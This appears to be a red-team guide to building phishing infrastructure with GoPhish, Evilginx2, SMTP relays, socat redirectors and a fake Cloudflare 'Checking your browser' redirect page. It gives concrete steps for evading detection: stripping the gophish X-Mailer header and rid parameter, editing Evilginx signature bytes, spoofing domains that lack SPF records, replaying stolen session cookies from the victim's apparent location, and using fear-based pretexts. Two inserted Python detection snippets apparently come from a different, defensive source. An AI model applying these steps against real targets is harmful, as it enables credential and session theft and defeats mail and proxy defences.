Phishing Infrastructure


Configuration Overview

Domain Name


After you buy a domain, set its name server records to DigitalOcean.

Buying Expired Domains


  • Domainhunter [Github]

    • Finding a domain based on keyword

    • Checks categorization against Bluecoat and IBM XForce.

    • Check IP History of Domain

Adding Content to Domain [Wayback machine]

If you want this url: but without the WebArchive toolbar?

Add “id_” before the referenced url:

Please note: The Wayback Machine doesn’t download JPGs or stylesheets when you add “id_” to the URL. First wget the regular version (with the toolbar, JPGs and stylesheets), then wget the “id_” version. The second download overwrites the HTML files with versions that don’t include the toolbar and leaves the rest in place.

Free/Paid HTML Templates

  • Get single-page HTML templates.

  • Additional resources can be hosted on an S3 bucket.

Domain Categorization

During OSINT, identify which internal proxy/firewall technology the target is using.


  • Send Phish

  • Track interaction

  • Landing-page Hosting


  • Install Kali. Refer this

    • Firewall Rule sets:

      • ufw allow proto tcp from any to any port 80,443 [Landing page]

      • ufw allow 22

      • ufw allow 8080 [Gophish Admin page]

    • Setup tmux : Refer this

  • Set up a certificate using Let's Encrypt.

snap install core
snap refresh core
snap install --classic certbot
sudo certbot --nginx
#Enter when prompted <space>

wget <gophish>
apt install unzip
chmod +x gophish
#update Gophish listening address in its config file config.json. 
#Use your favorite editor and change listen_url to

#Copy certs to GoPhish Directory 
# cp /etc/letsencrypt/live/[DOMAIN]/privkey.pem [DOMAIN].key
# cp /etc/letsencrypt/live/[DOMAIN]/fullchain.pem [DOMAIN].crt
#Update config.json [Phish Server Param]
  • Set up the Sending Profile. Test with temp mails. If the target does not have SPF records, you can send using their domain to improve the trust factor.

  • Set up the landing page using the 'Import URL' feature.

  • Set up the Email Template.

    • Use stripo to create beautiful HTML emails.

    • After copying to email template, replace the URL with {{.URL}}

    • Be creative with the pretense. Use the element of fear. Eg: Job cutbacks.

  • Clone a website using landing page feature on GoPhish.

  • Launch campaign


  • Remove the X-Mailer header value: gophish [Sending Profile settings]

  • Change Default RID parameter to anything else to avoid signatures. Eg: http://<URL>?rid=123

#Change this
const RecipientParameter = "rid"
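Seen from the detection side, the two defaults named above (the gophish mailer header and the rid tracking parameter) are what mail and proxy telemetry can be searched for. The following is an added example, not part of the original page or of Gophish; the sample message, the log line format and the hostnames are constructed for illustration.

```python
import re
from email import message_from_string
from urllib.parse import urlsplit, parse_qs

# Constructed sample data (not from a real campaign).
SAMPLE_EMAIL = """\
From: IT Helpdesk <helpdesk@example.test>
To: user@corp.example
Subject: Password expiry notice
X-Mailer: gophish
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8

<a href="https://portal.example.test/login?rid=aB3dE9x">Reset</a>
"""

# Assumed proxy log format: client_ip method url status
SAMPLE_PROXY_LOG = [
    "10.0.4.17 GET https://portal.example.test/login?rid=aB3dE9x 200",
    "10.0.4.22 GET https://intranet.corp.example/wiki?page=home 200",
    "10.0.4.31 GET https://portal.example.test/login?rid=Zk81QpL 200",
]

HREF_RE = re.compile(r'href="([^"]+)"', re.I)

def rid_of(url, param="rid"):
    """Return the value of the tracking parameter in the URL, or None."""
    values = parse_qs(urlsplit(url).query).get(param)
    return values[0] if values else None

def scan_email(raw, param="rid"):
    """Flag the default X-Mailer value and links carrying a tracking id."""
    msg = message_from_string(raw)
    findings = []
    if (msg.get("X-Mailer") or "").strip().lower() == "gophish":
        findings.append(("header", "X-Mailer: gophish"))
    for url in HREF_RE.findall(msg.get_payload()):
        if rid_of(url, param):
            findings.append(("link", url))
    return findings

def clicks_by_host(log_lines, param="rid"):
    """Map landing host -> set of (client_ip, tracking id) from proxy logs."""
    hits = {}
    for line in log_lines:
        client, _method, url, _status = line.split()
        rid = rid_of(url, param)
        if rid:
            hits.setdefault(urlsplit(url).hostname, set()).add((client, rid))
    return hits
```

Several internal clients requesting the same external host with different tracking values is the pattern worth triaging; because both defaults can be changed, a miss here is inconclusive.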


  • HTTP Proxy/Router

  • BLOCK all scanning

  • Host multiple websites

  • Let's Encrypt/SSL


apt-get update
apt-get install nginx certbot python3-certbot-nginx git golang-go unzip net-tools
apt install git make

sudo service nginx restart
nginx -t && nginx -s reload

#Set up SSL certs with LetsEncrypt
sudo certbot --nginx -d <> -d <>

#Append to /etc/resolv.conf

#Disable any other DNS services
sudo systemctl stop systemd-resolved

cd /opt
git clone
cd evilginx2
#Install globally
make install

config domain <Domain name>
config ip <IP> 


  • Remove the Signature Evilginx Headers from http_proxy.go

#Grep for ' := []byte '

hg := []byte{0x94, 0xE1, 0x89, 0xBA, 0xA5, 0xA0, 0xAB, 0xA5, 0xA2, 0xB4}
e := []byte{208, 165, 205, 254, 225, 228, 239, 225, 230, 240}

Inject Stolen Cookies

  • Cookie Editor Extension [Mozilla extension] -> Import stolen cookie

  • Change source-IP to that of Victim's location to avoid suspicious logs.
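Because a replayed cookie can arrive from the victim's own country, a geo-only check stays silent; binding a session to its network and user agent still shows the change. The following is an added example for defenders, not part of the original page; the event fields, the session identifiers and the /24 grouping are assumptions, and the log is constructed.

```python
import ipaddress
from collections import namedtuple

Event = namedtuple("Event", "ts session_id ip country user_agent")

# Constructed web-session log; session_id stands for a hash of the cookie.
SAMPLE_EVENTS = [
    Event(1000, "s-41f0", "198.51.100.7", "DE", "Firefox/128 Windows"),
    Event(1060, "s-41f0", "198.51.100.7", "DE", "Firefox/128 Windows"),
    Event(1100, "s-9c2e", "203.0.113.20", "US", "Chrome/126 macOS"),
    Event(1300, "s-41f0", "192.0.2.55", "DE", "Firefox/115 Linux"),
    Event(1400, "s-9c2e", "203.0.113.21", "US", "Chrome/126 macOS"),
]

def same_network(ip_a, ip_b, prefix=24):
    """True if both addresses fall in the same /prefix network."""
    net = ipaddress.ip_network(f"{ip_a}/{prefix}", strict=False)
    return ipaddress.ip_address(ip_b) in net

def context_changes(base, ev):
    """List which parts of the client context differ from the first sighting."""
    reasons = []
    if ev.country != base.country:
        reasons.append("country")
    if not same_network(base.ip, ev.ip):
        reasons.append("network")
    if ev.user_agent != base.user_agent:
        reasons.append("user_agent")
    return reasons

def detect_reuse(events, geo_only=False):
    """Alert when a session's context changes after it was first seen."""
    first_seen, alerts = {}, []
    for ev in sorted(events, key=lambda e: e.ts):
        base = first_seen.setdefault(ev.session_id, ev)
        if base is ev:
            continue
        reasons = context_changes(base, ev)
        if geo_only:
            suspicious = "country" in reasons
        else:
            suspicious = ("country" in reasons or
                          ("network" in reasons and "user_agent" in reasons))
        if suspicious:
            alerts.append((ev.session_id, ev.ip, tuple(reasons)))
    return alerts
```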

SMTP Servers

  • Use Valid Mail server providers to gain reputation.

Deploy SMTP Server in VPS

  • Postfix-Server-Setup : Remove sensitive information from email headers.

Rate Emails


Powershell: Send-MailMessage

Send-MailMessage -To "<recipient's email address>" -From "<sender's email address>" -Subject "Your message subject" -Body "Some important plain text!" -Attachments .\data.csv -SmtpServer "<smtp server>" -Port 25


  • Use a valid domain to create free email IDs & send mails to targets


curl -s --user 'api:<API-KEY-HERE>' \<YOUR-DOMAIN-HERE>/messages \
    -F from='First Last name<noreply@YOUR-DOMAIN-HERE>' \
    -F to='<RECIPIENT>' \
    -F subject='Hello' \
    -F text='Notification'

Analyze email content for spam score

  • Test Sending Emails with

  • Use a proxy website URL while sending mails to redirect to landing page. This bypasses Email Filters and prevents scanners from flagging your landing domain as malicious.

<html lang="en-US">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="UTF-8">
<title>Just a moment...</title>
<table width="100%" height="100%" cellpadding="30">
<td align="center" valign="center">
<h1>Checking your browser</h1>
<div id="challenge" style="display:none;">
<p>This process is automatic. Your browser will redirect to your requested content shortly.</p>
<p>Please allow up to 5 seconds...</p>
<div style="margin-top:20px;">
<a href="" target="_blank" style="font-size: 12px;">DDoS protection by CloudFlare</a>
            window.location.href = "<INSERT-YOUR-LANDING-PAGE-HERE>";


#DNS Redirector
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:<DEST IP>; echo -ne

#HTTP Redirector
socat TCP4-LISTEN:80,bind=<Interface IP>,fork TCP4:<DEST IP>:80


  • Hide our IP Address

  • IP Filtering [Based on country]

  • Domain Reputation




  • For OS Configuration

Ansible Vault | Secret Management

  • Use when using hard-coded tokens/API Keys


  • For everything other than OS Configuration.



  • Clone Github Repo

  • Set up API keys [DigitalOcean + Azure]

  • Configure variable files

  • Run playbook
